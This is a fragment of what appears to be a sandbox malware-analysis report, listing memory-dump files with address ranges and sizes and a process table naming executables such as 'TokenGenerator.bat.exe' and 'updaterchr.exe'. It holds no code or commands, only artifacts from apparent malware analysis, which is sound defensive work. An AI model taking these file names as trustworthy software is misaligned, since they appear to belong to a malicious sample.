memory/4408-231-0x0000021EFB180000-0x0000021EFB19C000-memory.dmp

Filesize
112KB

Download
memory/4408-220-0x0000021EFAF30000-0x0000021EFAF4C000-memory.dmp

Filesize
112KB

Download
memory/4408-197-0x0000000000000000-mapping.dmp

Download
memory/4412-183-0x0000000000000000-mapping.dmp

Download
memory/4468-215-0x0000000000000000-mapping.dmp

Download
memory/4484-213-0x0000000000000000-mapping.dmp

Download
memory/4688-205-0x0000000000000000-mapping.dmp

Download
memory/4748-228-0x00000000057C0000-0x00000000058CA000-memory.dmp

Filesize
1.0MB

Download
memory/4748-200-0x00000000051A0000-0x00000000057B8000-memory.dmp

Filesize
6.1MB

Download
memory/4748-150-0x0000000000000000-mapping.dmp

Download
memory/4748-201-0x0000000004B80000-0x0000000004B92000-memory.dmp

Filesize
72KB

Download
memory/4748-189-0x00000000001F0000-0x000000000020E000-memory.dmp

Filesize
120KB

Download
memory/4748-263-0x0000000005FC0000-0x0000000006026000-memory.dmp

Filesize
408KB

Download
memory/4748-202-0x0000000004BE0000-0x0000000004C1C000-memory.dmp

Filesize
240KB

Download
memory/4748-262-0x00000000067A0000-0x0000000006CCC000-memory.dmp

Filesize
5.2MB

Download
memory/4748-259-0x00000000060A0000-0x0000000006262000-memory.dmp

Filesize
1.8MB

Download
memory/4764-216-0x0000000000000000-mapping.dmp

Download
memory/4832-186-0x0000000000000000-mapping.dmp

Download
memory/4980-207-0x0000000000000000-mapping.dmp

Download
memory/5008-178-0x0000000000000000-mapping.dmp

Download

pid	process
2404	TokenGenerator.bat.exe
4748	1.exe
1300	2.exe
2200	3.exe
1780	updaterchr.exe
1532	containersavesdhcp.exe